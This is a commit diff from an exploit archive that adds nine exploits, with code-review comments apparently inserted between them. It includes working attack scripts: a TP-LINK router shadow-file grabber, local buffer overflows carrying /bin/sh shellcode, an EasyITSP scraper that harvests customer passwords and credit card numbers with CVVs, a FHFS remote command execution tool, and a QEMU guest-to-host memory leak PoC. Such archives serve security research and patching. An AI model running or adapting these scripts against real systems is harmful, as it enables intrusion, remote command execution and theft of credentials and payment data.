DB: 2015-08-28

9 new exploits
Offensive Security 2015-08-28 05:02:06 +00:00
parent d7e6c62801
commit cbbb44e659
10 changed files with 497 additions and 5 deletions


@ -34239,10 +34239,10 @@ id,file,description,date,author,platform,type,port
37907,platforms/php/webapps/37907.txt,"WordPress MDC Private Message Plugin 1.0.0 - Persistent XSS",2015-08-21,"Chris Kellum",php,webapps,80
37908,platforms/windows/dos/37908.py,"Konica Minolta FTP Utility 1.0 - Remote DoS PoC",2015-08-21,"Shankar Damodaran",windows,dos,21
37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0
37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 wwlib.dll Type Confusion",2015-08-21,"Google Security Research",windows,dos,0
37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write",2015-08-21,"Google Security Research",windows,dos,0
37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 MSO.dll Arbitrary Free",2015-08-21,"Google Security Research",windows,dos,0
37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 MSO.dll Use-After-Free",2015-08-21,"Google Security Research",windows,dos,0
37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 wwlib.dll Type Confusion - MS15-081",2015-08-21,"Google Security Research",windows,dos,0
37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write - MS15-080",2015-08-21,"Google Security Research",windows,dos,0
37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 MSO.dll Arbitrary Free - MS15-081",2015-08-21,"Google Security Research",windows,dos,0
37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 MSO.dll Use-After-Free - MS15-081",2015-08-21,"Google Security Research",windows,dos,0
37914,platforms/windows/dos/37914.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos,0
37915,platforms/windows/dos/37915.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37916,platforms/windows/dos/37916.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0
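Review bot: the bulletin tagging on the four replaced rows (37910-37913 now end in " - MS15-081" / " - MS15-080") is applied inconsistently within the same Google Security Research batch: 37909 (wwlib.dll fcPlcfFldMom), the row directly above them, and the win32k/ATMFD font rows 37914-37916 below still carry no bulletin id. If the mapping for those is known, add it in the same pass, so that a defender grepping the CSV for an MS15-08x bulletin sees the whole set rather than four entries. (The -/+ markers were lost in extraction, which is why each of the four ids appears twice here; the hunk header's 10/10 line count confirms these are in-place replacements, with the second copy being the new line.)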
@ -34253,7 +34253,7 @@ id,file,description,date,author,platform,type,port
37921,platforms/windows/dos/37921.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37922,platforms/windows/dos/37922.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37923,platforms/windows/dos/37923.txt,"Windows ATMFD.DLL CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0
37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 MSPTLS Heap Index Integer Underflow",2015-08-21,"Google Security Research",windows,dos,0
37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 MSPTLS Heap Index Integer Underflow - MS15-081",2015-08-21,"Google Security Research",windows,dos,0
37925,platforms/windows/local/37925.txt,"Mozilla Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0
37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
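Review bot: same inconsistency as the previous hunk: 37924 gains " - MS15-081" while the adjacent ATMFD.DLL rows 37921-37923 from the same batch keep none, so bulletin searches on the CSV will still miss part of the set; either tag the whole batch or leave it untagged until the mapping is confirmed.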
@ -34294,3 +34294,12 @@ id,file,description,date,author,platform,type,port
37979,platforms/php/webapps/37979.txt,"VicBlog Multiple SQL Injection Vulnerabilities",2012-10-26,Geek,php,webapps,0
37980,platforms/windows/dos/37980.pl,"Microsoft Office Excel Denial of Service Vulnerability",2012-10-11,"Jean Pascal Pereira",windows,dos,0
37981,platforms/windows/dos/37981.pl,"Microsoft Paint 5.1 '.bmp' Denial of Service Vulnerability",2012-10-27,coolkaveh,windows,dos,0
37982,platforms/hardware/remote/37982.pl,"TP-LINK TL-WR841N Router Local File Include Vulnerability",2012-10-29,"Matan Azugi",hardware,remote,0
37983,platforms/php/webapps/37983.php,"EasyITSP 'customers_edit.php' Authentication Security Bypass Vulnerability",2012-10-26,"Michal Blaszczak",php,webapps,0
37984,platforms/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 '.avi' File Local Denial of Service Vulnerability",2012-10-26,Am!r,windows,dos,0
37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80
37986,platforms/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 Stack Based Buffer Overflow",2015-08-27,"_ Un_N0n _",windows,dos,0
37987,platforms/linux/local/37987.py,"FENIX 0.92 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
37989,platforms/php/webapps/37989.txt,"IP.Board 4.X - Stored XSS",2015-08-27,snop,php,webapps,0
37990,platforms/multiple/dos/37990.txt,"QEMU Programmable Interrupt Timer Controller Heap Overflow",2015-08-27,"Google Security Research",multiple,dos,0
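Review bot: the port column is inconsistent among the nine added rows: 37982 (TP-LINK TL-WR841N) is recorded with port 0 even though its PoC in this commit issues an HTTP GET to the router, while 37985 (FHFS), also an HTTP request, is recorded as 80. Separately, the SecurityFocus-imported rows 37982-37984 keep their original 2012 advisory dates while the other six carry 2015-08-27; that is correct for provenance but worth a line in the commit message ("9 new exploits"), since date-sorted views of the CSV will not show them as new.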



@ -0,0 +1,46 @@
source: http://www.securityfocus.com/bid/56320/info
TP-LINK TL-WR841N router is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the affected device. This may aid in further attacks.
TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n is vulnerable; other versions may also be affected.
#TP-LINK TL-WR841N Shadow file grabber#
#built by Pulse matan () madsec co il#
#enjoy#
use LWP::UserAgent;
$host = $ARGV[0];
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host";; };
my $ua = LWP::UserAgent->new;
$ua->timeout(30);
$lfi = "/help/../../../../../../../../etc/shadow";
$url = $host.$lfi;
$request = HTTP::Request->new('GET', $url);
$response = $ua->request($request);
my $html = $response->content;
if($html =~ /root/) {
print "root$' \n" ;
}
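Review bot: the classification in the summary line ("local file-include") does not match the request the script builds: the $lfi path is a ../ traversal through the /help/ handler that reads a file, not an include of a script, so the entry should be labelled path traversal / arbitrary file read and the csv description should follow. The header also records no vendor fix or firmware build that closes the issue, only the tested build (3.13.9 Build 120201); a "Solution" line, as 37989.txt in this commit has, would make the entry usable for patch triage. Code-style points: no shebang, no use strict / use warnings, a stray ";;" on the http:// check line, and $host is used unchecked when $ARGV[0] is absent.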

platforms/linux/local/37987.py Executable file

@ -0,0 +1,48 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: fenix - development environment for making 2D games
# Tested on: GNU/Linux - Kali Linux 2.0
#
# Description: FENIX v0.92 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://fenix.divsite.net/
# Kali Linux 2.0 package: http.kali.org_kali_dists_sana_main_binary-i386_Packages
# MD5: 38bc1c509eb023c24a58cda0c5db19d9
import os,subprocess
def run():
try:
print "# FENIX v0.92 Stack-BoF by Juan Sacco"
print "# Wasting CPU clocks on unusable exploits"
print "# This exploit is for educational purposes only"
# Basic structure: JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*4
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*254
eip = "\x44\xd2\xff\xbf"
subprocess.call(["fenix-fxi", junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "FENIX not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Sorry, something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit FENIX v0.92 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()
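Review bot: howtousage() calls sys.exit() but only os and subprocess are imported, so the error path itself raises NameError, and the try/except IndexError around two print statements in __main__ can never trigger, so howtousage() is dead code (the script takes no arguments at all). The header should state the preconditions the payload implies: eip is a fixed stack address ("\x44\xd2\xff\xbf"), so the PoC presumes a 32-bit build with ASLR disabled, which is also the mitigation story for this entry and belongs next to "Tested on". Documentation gaps: the overflowed input is only identifiable from the subprocess.call line (the first argument to fenix-fxi), the "MD5" line refers to the Packages index rather than the binary tested, and no fixed version is given for a bug described as affecting "v0.92 and prior".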

platforms/linux/local/37988.py Executable file

@ -0,0 +1,47 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: bsign - embed and verify secure hashes and digital signatures
# Tested on: GNU/Linux - Kali Linux 2.0
#
# Description: BSIGN v0.4.5 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.debian.org
# Kali Linux 2.0 package: http.kali.org_kali_dists_sana_main_binary-i386_Packages
# MD5: 0fc1d2e9c374c1156b2b02186a9f8980
import os,subprocess
def run():
try:
print "# BSIGN v0.4.5 Stack-BoF by Juan Sacco"
print "# Wasting CPU clocks on unusable exploits"
print "# This exploit is for educational purposes only"
# Basic structure: JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*8
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*248
eip = "\x10\xd3\xff\xbf"
subprocess.call(["bsign -f",'-f ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "BSIGN not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Sorry, something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit BSign 0.4.5 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()
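Review bot: the same import and dead-code issues as 37987.py apply here (sys not imported, unreachable IndexError handler), and in addition the subprocess.call argv list does not match the invocation the header describes: the program name and its flag are packed into one string ("bsign -f") followed by a second "-f ", so as committed the call fails into the ENOENT branch and prints "BSIGN not found!" before anything is exercised. The "Tested on" claim therefore does not describe the code that was committed; re-test and correct before merge. "Vendor homepage: http://www.debian.org" also points at the distributor rather than the bsign project, and as with 37987.py the MD5 identifies the Packages index, not the binary.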

platforms/multiple/dos/37990.txt Executable file

@ -0,0 +1,119 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=419#c4
The programmable interrupt timer (PIT) controller in QEMU does not correctly validate the channel number when performing IO writes to the device controller, allowing both an information disclosure and heap-overflow within the context of the host.
Depending on the layout of the data beyond the heap allocation, this vulnerability can set various bytes just beyond the heap allocation to non-attacker controlled values (mainly zero), as well as leaking various bytes from beyond the heap allocation back to the guest.
== Detail ==
The vulnerable function and relevant structures are given below:
typedef struct PITChannelState {
int count; /* can be 65536 */
uint16_t latched_count;
uint8_t count_latched;
uint8_t status_latched;
uint8_t status;
uint8_t read_state;
uint8_t write_state;
uint8_t write_latch;
uint8_t rw_mode;
uint8_t mode;
uint8_t bcd; /* not supported */
uint8_t gate; /* timer start */
int64_t count_load_time;
/* irq handling */
int64_t next_transition_time;
QEMUTimer *irq_timer;
qemu_irq irq;
uint32_t irq_disabled;
} PITChannelState;
typedef struct PITCommonState {
ISADevice dev;
MemoryRegion ioports;
uint32_t iobase;
PITChannelState channels[3];
} PITCommonState;
static uint64_t pit_ioport_read(void *opaque, hwaddr addr,
unsigned size)
{
PITCommonState *pit = opaque;
int ret, count;
PITChannelState *s;
addr &= 3;
s = &pit->channels[addr];
if (s->status_latched) {
s->status_latched = 0;
ret = s->status;
} else if (s->count_latched) {
switch(s->count_latched) {
default:
case RW_STATE_LSB:
ret = s->latched_count & 0xff;
s->count_latched = 0;
break;
case RW_STATE_MSB:
ret = s->latched_count >> 8;
s->count_latched = 0;
break;
case RW_STATE_WORD0:
ret = s->latched_count & 0xff;
s->count_latched = RW_STATE_MSB;
break;
}
} else {
switch(s->read_state) {
default:
case RW_STATE_LSB:
count = pit_get_count(s);
ret = count & 0xff;
break;
case RW_STATE_MSB:
count = pit_get_count(s);
ret = (count >> 8) & 0xff;
break;
case RW_STATE_WORD0:
count = pit_get_count(s);
ret = count & 0xff;
s->read_state = RW_STATE_WORD1;
break;
case RW_STATE_WORD1:
count = pit_get_count(s);
ret = (count >> 8) & 0xff;
s->read_state = RW_STATE_WORD0;
break;
}
}
return ret;
}
By specifying the value of addr to be IOPORT_PIT_CHANNEL0+3, the value of "addr & 3" will be set to 3. This is then used as a array index into s->channels, however since C array-indexes are zero-based (i.e. array[3] points to the fourth element of an array), and there are only three channels in the "PITCommonState.channels" field, this causes the "s" variable to point just beyond the bounds of the "PITChannelState" heap allocation.
What happens next is heavilly dependent on the bytes present beyond the heap allocation.
Firstly, the "s" variable - invalidly pointing beyond the heap allocation - dereferences the value "status_latched". If this value is non-zero, the host leaks the value held at "s->status" back to the guest, and triggers a relative write beyond bounds by setting a zero byte beyond the heap allocation at "s->status_latched".
If the value is zero - or if the vulnerability is triggered a second time - the value at "s->count_latched" is inspected. If it is non zero, the function can either leak the low, high, or both bytes of "s->latched_count" back to the guest, as well as causing "s->count_latched" to be set to zero.
If s->count_latched is also zero - or if the vulnerability is triggered a third time - the value at s->read_state is finally read. Depending its value, and the value of s->mode, this method can leak the low, high or both bytes of s->count back to the guest, and can cause the byte corresponding to s->read_state to be invalidly set to zero.
== PoC ==
Triggering this vulnerability from the context of a guest machine (running in Ring-0 in the guest VM) is simple:
#define IOPORT_PIT_CHANNEL0 0x40
void kmain()
{
uint8_t hostleaked;
size_t i;
for(i = 0; i < 6; i++)
{
// trigger write-beyond-bounds and host leak:
hostleaked = __inb(IOPORT_PIT_CHANNEL0 + 3);
}
}
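Review bot: the first paragraph says the PIT controller fails to validate the channel on "IO writes", but the Detail section only reproduces pit_ioport_read and the PoC only reads (__inb); either include the write path or correct the sentence to match what is demonstrated. The advisory also gives no fix reference (upstream QEMU commit, version or CVE id), which is what a host operator needs in order to act on it, and the loop bound of 6 in kmain() is unexplained: the text describes three successive states (status_latched, count_latched, read_state), so a comment tying the iterations to that sequence would help readers follow it. Finally, the corruption described is a one-byte zero write at fixed offsets just past the allocation, so "out-of-bounds write" is a more precise label than "heap-overflow" in the summary.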

platforms/php/webapps/37983.php Executable file

@ -0,0 +1,115 @@
source: http://www.securityfocus.com/bid/56321/info
EasyITSP is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and gain unauthorized access to customer's information.
EasyITSP 2.0.2 is vulnerable; other versions may also be affected.
<?php
error_reporting(0);
$arguments = getopt("a:b:c:");
$url = $arguments['a'];
$id_pod =$arguments['b'];
$id_end =$arguments['c'];
if(count($arguments)!=3)
{
echo '## Exploit - EasyITSP by Lemens Telephone Systems 2.0.2 '."\n";
echo '## Discovery users with passwords '."\n";
echo '## '."\n";
echo '## Author: Michal Blaszczak '."\n";
echo '## Website: blaszczakm.blogspot.com '."\n";
echo '## Date: 10.10.2012 '."\n";
echo '## '."\n";
echo '## Greatz: cond, packet, jestemka1pi, sid, chez '."\n";
echo '## #pakamera@freenode '."\n";
echo '## (old) #2600@ircnet '."\n";
echo '## (old) #mamo_mamo_jestem_chakerem@ircnet '."\n";
echo '## '."\n";
echo '## Usage: '."\n";
echo '## php exploit.php -a URL -b ID_START -c ID_STOP '."\n";
echo '## '."\n";
echo '## Example: '."\n";
echo '## php exploit.php -a http://lemens-ts.com/easyitsp/customer/ -b
5 -c 10'."\n";
exit;
}
$url2='customers_edit.php?currentpage=customers';
$url.=$url2;
for ($id_pod; $id_pod <= $id_end; $id_pod++) { $cookie = 'cust_verify=' . urlencode('#pakamera') . '; cust_id=' .
urlencode($id_pod);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_COOKIE, $cookie); curl_setopt($ch, CURLOPT_POST, 1);//przesylamy metod. post curl_setopt($ch, CURLOPT_POSTFIELDS, "customersid=$id_pod"); //dane do wyslania curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $intro = curl_exec($ch); curl_close($ch);
$regex_login = '#\<td title="Customer username for
portal"\>(.+?)\<\/td\>#s';
preg_match($regex_login, $intro, $login);
$regex_pass = '#\<td title="Customer password for portal"><input
type="password" name="password" required="1" maxlength="45"
value="(.+?)"\>\<\/td\>#s';
preg_match($regex_pass, $intro, $pass);
$regex_ccnum = '#\<td title="Customer cc number"><input type="text"
name="ccnumber" maxlength="20" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccnum, $intro, $ccnum);
$regex_ccexpire = '#\<td title="Customer cc expire"><input type="text"
name="ccexpire" maxlength="8" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccexpire, $intro, $ccexpire);
$regex_cccvv = '#\<td title="Customer credit card CVV"><input
type="text" name="cccvv" maxlength="6" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_cccvv, $intro, $cccvv);
$test = explode(" ",$login[1]);
if(trim($test[0])!='</td>')
{
echo 'ID:'.$id_pod."\n";
echo 'LOGIN:'.$login[1]."\n";
echo 'Password:'.$pass[1]."\n";
echo 'CCnumber:'.$ccnum[1]."\n";
echo 'CCexpire:'.$ccexpire[1]."\n";
echo 'CCCVV:'.$cccvv[1]."\n\n";
}
}
?>
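Review bot: the regexes show customers_edit.php echoing the card number, expiry and the CVV into plain form fields, meaning the application stores the CVV, which PCI DSS prohibits regardless of the access-control bypass; that deserves to be called out as a separate finding in the advisory text rather than left implicit in the script's output. Two inline comments are in Polish: "przesylamy metod. post" is "we send via the POST method" and "dane do wyslania" is "data to send". Code points: $arguments is indexed before the count($arguments)!=3 check and error_reporting(0) hides the resulting notices; the Example line of the usage text is wrapped mid-argument ("-b" / "5 -c 10"), which breaks copy-paste; and the header Date (10.10.2012) differs from the csv date (2012-10-26).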

platforms/php/webapps/37989.txt Executable file

@ -0,0 +1,31 @@
# Exploit Title: IP.Board 4.X Stored XSS
# Date: 27-08-2015
# Software Link: https://www.invisionpower.com/
# Exploit Author: snop.
# Contact: http://twitter.com/rabbitz_org
# Website: http://rabbitz.org
# Category: webapps
1. Description
A registered or non-registered user can create a calendar event
including malicious JavaScript code who will be permanently stored in
the pages source.
2. Proof of Concept
http://URL_TO_FORUM/calendar/submit/?calendar=1
POST:
Affected Paramter: event_location[address][]
3. Solution
Update to version 4.0.12.1
https://community.invisionpower.com/release-notes/40121-r22/
Disclosure Timeline
27.07.15: Vendor notified
05.08.15: Fix released
27.08.15: Public disclosure
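Review bot: the Proof of Concept section is an endpoint and a parameter name with an empty "POST:" line; it should state which page renders the stored value unescaped (the event view, the calendar listing, or both) so that an administrator can verify the fix, and the description should be tightened ("Affected Paramter" is a typo; "code who will be permanently stored" should read "which is"). The Solution line (4.0.12.1 with release notes) and the disclosure timeline are good and should be the model for the other text-only entries in this commit.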

platforms/windows/dos/37984.pl Executable file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/56322/info
KMPlayer is prone to a local denial-of-service vulnerability.
An local attacker can exploit this issue to crash the affected application, denying service to legitimate users.
KMPlayer 3.0.0.1440 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
#Title : KmPlayer v3.0.0.1440 Local Crash PoC
#Discovered By : Am!r
#Home : http://IrIsT.Ir/forum/
#tested : XP
#TNX : Alireza , C0dex , B3hz4d
my $po="\x46\x02\x00\x00";
open(C, ">:raw", "poc.avi");
print $po;
close(C);
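Review bot: print $po; writes the four bytes to STDOUT, not to the filehandle opened on poc.avi, so the script as committed produces an empty file; it needs print C $po; and a check on the return value of open. The advisory text also never says what the four bytes "\x46\x02\x00\x00" represent or which parser path in KMPlayer faults on an otherwise empty file, which makes the entry impossible to triage against later versions, and "An local attacker" should be "A local attacker".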

platforms/windows/dos/37986.txt Executable file

@ -0,0 +1,20 @@
********************************************************************************************
# Exploit Title: Xion Audio Player build 155 Stack Based BOF.
# Date: 8/19/2015
# Exploit Author: Un_N0n
# Software Vendor : http://www.xionplayer.com
# Software Link: http://www.xionplayer.com/page/download
# Version: 1.5 (Build 155)
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- open 'Xion.exe'.
2- Drag the malformed MP3 file into Xion Audio Player.
~ Software will Crash.
[Creating Malformed MP3 File?]:
>Replace the details of the legit MP3 file with large number of "A"s or any other random value.
**********************************************************************************************
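Review bot: the entry has no PoC file and no crash details: "Replace the details of the legit MP3 file" does not say which fields (presumably the ID3 tag fields) or what length, and nothing shows a stack location being overwritten, so the "Stack Based BOF" classification in the title and csv row is unsupported as written; at minimum include the crashing file or its generator and the faulting instruction. The Date line (8/19/2015) also differs from the csv date (2015-08-27), and there is no vendor contact or fix status.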


@ -0,0 +1,35 @@
#!/usr/bin/python
#
# FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution
#
# Author: Naser Farhadi
#
# Date: 26 August 2015 # Version: 2.1.2 # Tested on: Windows 7 SP1 (32 bit)
#
# Link : http://sourceforge.net/projects/fhfs/
#
# Description : FHFS is a FTP and HTTP Web Server package,
# transparently based on HFS and FileZilla. FHFS is built to act as an all-in-one user-based file hosting website,
# good for schools, businesses, etc. whose students/employees need to easily transport files.
# Usage:
# chmod +x FHFS.py
# ./FHFS.py
#
# Video: http://youtu.be/ch5A2bQEB0I
##
import socket
url = raw_input("Enter URL : ")
try:
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((url, 80))
cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ")
req = "GET /?{.exec|"+cmd+".}"
req += " HTTP/1.1\r\n\r\n"
sock.send(req)
sock.close()
print "Done!"
except KeyboardInterrupt:
print "Bye!"
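Review bot: the request assembled on the req lines is an HTTP/1.1 request line with no Host header and no other headers, which a strict server may reject with 400, and the script closes the socket without reading the response, so "Done!" is printed whether or not the server accepted the request; read and show the status line. The variable named url actually holds a hostname passed to sock.connect, and the header records no vendor notification or fixed version. For defenders the useful fact here is that the injected macro syntax ({.exec|...}) travels in the query string of an ordinary GET, so it is straightforward to alert on in web-server logs or a WAF rule while the software is being patched or retired.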